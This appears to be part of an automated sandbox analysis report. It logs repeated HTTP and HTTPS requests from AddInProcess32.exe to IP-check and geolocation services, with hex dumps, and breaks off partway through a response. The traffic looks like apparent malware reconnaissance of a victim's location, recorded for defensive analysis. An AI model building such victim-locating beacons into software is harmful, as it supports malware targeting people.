              0192.168.2.649699132.226.8.169806976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              May 23, 2024 15:13:01.645076036 CEST151OUTGET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Connection: Keep-Alive
              May 23, 2024 15:13:02.471041918 CEST321INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:02 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 961174ec75d60b82039f4908a4b20487
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
              May 23, 2024 15:13:02.551199913 CEST127OUTGET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              May 23, 2024 15:13:03.030545950 CEST321INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:02 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 9b4f563993276c84becb58e0b37bbfe2
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
              May 23, 2024 15:13:03.827977896 CEST127OUTGET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              May 23, 2024 15:13:04.173777103 CEST321INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:04 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 658981098ac4f899913755749fa58e44
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.649704132.226.8.169806976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              May 23, 2024 15:13:05.233206987 CEST127OUTGET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              May 23, 2024 15:13:06.155486107 CEST321INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:06 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 6586d3faf0ccfd491a96bf3639dea32a
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.649709132.226.8.169806976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              May 23, 2024 15:13:06.915304899 CEST127OUTGET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              May 23, 2024 15:13:07.840574980 CEST321INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:07 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 738451cdb053429ebb63a903d2eebcf9
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.649712132.226.8.169806976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              May 23, 2024 15:13:08.565377951 CEST127OUTGET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              May 23, 2024 15:13:09.408503056 CEST321INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:09 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 9dec79afed4e2c751404b81dab7e41fb
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.649714132.226.8.169806976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              May 23, 2024 15:13:10.206820011 CEST151OUTGET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Connection: Keep-Alive
              May 23, 2024 15:13:10.965600014 CEST321INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:10 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 21ecc224ab0aa588190aea359cb3ba6e
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.649716132.226.8.169806976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              May 23, 2024 15:13:11.989902973 CEST151OUTGET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Connection: Keep-Alive
              May 23, 2024 15:13:12.891972065 CEST321INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:12 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 80d2a7d946e85a627573387c5a4fb27e
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.649718132.226.8.169806976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              May 23, 2024 15:13:13.725131035 CEST151OUTGET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Connection: Keep-Alive
              May 23, 2024 15:13:14.962764978 CEST321INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:14 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 8542d5ac19c681798a67eb2e49904b0f
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              HTTPS Proxied Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.649700188.114.97.34436976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              2024-05-23 13:13:03 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              Connection: Keep-Alive
              2024-05-23 13:13:03 UTC710INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:03 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15044
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gdqcT1aX0ULlZC%2Fz5yI2EBZxuLcVSMGlvc6oq4HNgloPPJFOcs9vhCzJm6bpPBTAoqKUnIfQNg8WzY%2Be4DF2ApdbUrVYoV0p3pEP2jjPwl6%2Bx%2F3OKDZabolMO%2FiuCUtBmyrPk350"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d167e774299-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:03 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:03 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.649702188.114.97.34436976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              2024-05-23 13:13:04 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              2024-05-23 13:13:05 UTC706INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:05 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15046
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QzeXNIPZ3fOFu4TYPP5uia%2FeAyoI1jqQW5DcOTiDCllalFaB6taIsNU7vjaPPGXe6HDKTOOvvwZ3P34Q4SQukIHG18p7OPn4zhQ%2BG%2BsnJvaHeIdvf7uFWRQMdiCZMzYXgNQg6qiX"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d1ea99f4271-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:05 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:05 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.649707188.114.97.34436976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              2024-05-23 13:13:06 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              2024-05-23 13:13:06 UTC700INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:06 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15047
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wd1KOFe9ZXCdgV0QC74GtStDS1o8oEzkYlJjdURWO3MwL0BWWaVGt2t0ELFNL3sF760xVLXQ8EWC9vlAok6UCqeVbZXvXejGsNX0HFoFsw7dHQVdlqyQyBGdhq9eUoUPBPfyKvc7"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d2969ea0f83-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:06 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:06 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.649711188.114.97.34436976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              2024-05-23 13:13:08 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              2024-05-23 13:13:08 UTC714INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:08 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15049
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WTq5v7U%2FGEGYmpRjdTunxF%2FOpkPyBRQ2E9LZGvzlfSryiT43IR4k%2FqFHYcvlJqe8zMSv1%2BIVupH%2B8VcK0AKssRd%2B5LrKY74zBIbuWDgFAmAUSq4aQ0fgJHpWNN2IfgC1Ej73hjp%2B"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d33b84bc47a-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:08 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:08 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.649713188.114.97.34436976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              2024-05-23 13:13:09 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              2024-05-23 13:13:10 UTC708INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:10 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15051
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t7VTgAvQUDsax7TRh%2FuuU%2FfpdZFTg3MyOikxHAFqzNODcQ0v05iemFNaQC9WDAgi7L069JeIUhmQXoSxf7Cjwb9hXTIQUbX0nz%2FVUI2KEjbcxxuO1cUe3%2FXM4oYmFryoVMhuACfM"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d3dcc409dff-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:10 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:10 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.649715188.114.97.34436976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              2024-05-23 13:13:11 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              2024-05-23 13:13:11 UTC716INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:11 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15052
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BNBs%2FBaSqctIFKHYXgAkWIbt6i%2Bh%2Bc7nU9F%2BoMsUBevpkdkljvrESAOOTIhcLwV0tCpA%2B6DCFNsv4KjW0j62xX8tlL%2B%2BRS31S7kSZoTXwLNjqO5lDDUAS0iHviYnWWRQSjg8GA5%2B"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d490ae2c3ee-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:11 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:11 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.649717188.114.97.34436976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              2024-05-23 13:13:13 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              Connection: Keep-Alive
              2024-05-23 13:13:13 UTC712INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:13 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15054
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
